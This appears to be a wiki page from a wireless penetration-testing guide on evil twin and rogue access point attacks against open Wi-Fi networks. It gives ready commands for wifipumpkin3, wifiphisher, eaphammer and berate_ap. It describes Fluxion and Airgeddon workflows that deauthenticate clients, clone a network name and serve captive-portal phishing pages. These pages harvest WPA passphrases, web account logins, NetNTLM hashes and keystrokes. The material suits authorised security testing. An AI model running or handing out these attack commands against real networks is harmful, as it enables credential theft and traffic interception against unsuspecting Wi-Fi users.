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11. Open Network (no passphrase) Rogue AP Evil Twin

Koutto edited this page Nov 1, 2020 · 1 revision

Basic Open Network

This basic setup can be used to perform standard Man-in-th-Middle attacks on the clients.

berate_ap <interface_AP> <interface_internet> <SSID>

Note: Internet sharing (forwarding) is enabled by default

Open Network Evil Twin + Captive Portal Attack

Captive Portal can be used to serve:

  • Phishing page (fake form) to attempt getting:
    • WPA passphrase (when evil twin of WPA/WPA2 secured AP),
    • Credentials (e.g. Facebook, Gmail...)
  • Payload Delivery
  • NetNTLMv1/v2 hashes by forcing SMB connection

With wifipumpkin3:

wifipumpkin3 --xpulp "set interface wlan0; set ssid FreeWifi; set proxy captiveflask; set captiveflask.DarkLogin true; start"

Note: Custom captive portal can be developed based on: (use misc.extra_captiveflask)

With Fluxion (interactive + automated):

To automatically perform Evil Twin Attack against WPA/WPA2 network with captive portal attack aimed at phishing WPA passphrase: Fluxion can be used:

./  # Starts multiple xterm, requires X session
  1. Run Handshake Snooper mode (capture a WPA/WPA2 handshake, used after phishing to check for validity of passphrase
  2. Run Captive Portal mode (supports many box/router default web interfaces)
    • Spawn AP with same SSID as target AP (Evil Twin).
    • Send deauth + disassociation to clients.
    • Wait for client connection & successful phishing.
    • Check submitted WPA passphrase using captured handshake.

With Airgeddon (interactive + automated):

To automatically perform Evil Twin Attack against WPA/WPA2 network with captive portal attack aimed at phishing WPA passphrase: Airgeddon can be used (work similarly as Fluxion, works better against Android devices during my tests):

./ # Starts multiple xterm, requires X session

Open Network Evil Twin + KARMA/MANA/Loud MANA/Known Beacons Attack + Captive Portal

With wifiphisher:

  • Evil Twin + KARMA:
wifiphisher -aI <interface_rogue_AP> -eI <interface_deauthenticating> -iI <interface_internet> \
-p firmware-upgrade --handshake-capture handshake.pcap -kN 	# Interactive target AP selection

wifiphisher -aI <interface_rogue_AP> -eI <interface_deauthenticating> -iI <internet_interface> \
-p firmware-upgrade --handshake-capture handshake.pcap --essid <target_SSID> -kN
  • Known Beacons Attack:
wifiphisher -aI <interface_rogue_AP> -eI <interface_deauthenticating> -iI <internet_interface> \
-p oauth-login --known-beacons --essid "Free WiFi" -kN

Note: Known beacons wordlist:

-p is for captive portal scenario. Scenarios available:

With eaphammer:

  • Evil Twin + MANA (Improved KARMA):
./eaphammer -i wlan0 --channel <channel_number> --auth open --essid <SSID> \
--captive-portal --mana
  • Evil Twin + Loud MANA (Improved MANA):
./eaphammer -i wlan0 --channel <channel_number> --auth open --essid <SSID>\
--captive-portal --mana --loud
  • Evil Twin + Loud MANA (Improved MANA) + Known Beacons attack (to attack clients not performing active probing) - All-in-one / Most effective:
./eaphammer -i wlan0 --channel <channel_number> --auth open --essid <SSID> \
--captive-portal --mana --loud --known-beacons --known-ssids-file <ssid_wordlist>

Captive portal attack can capture credentials using:

  • Form submission sniffing
  • Keystroke capture (results stored in user.log)
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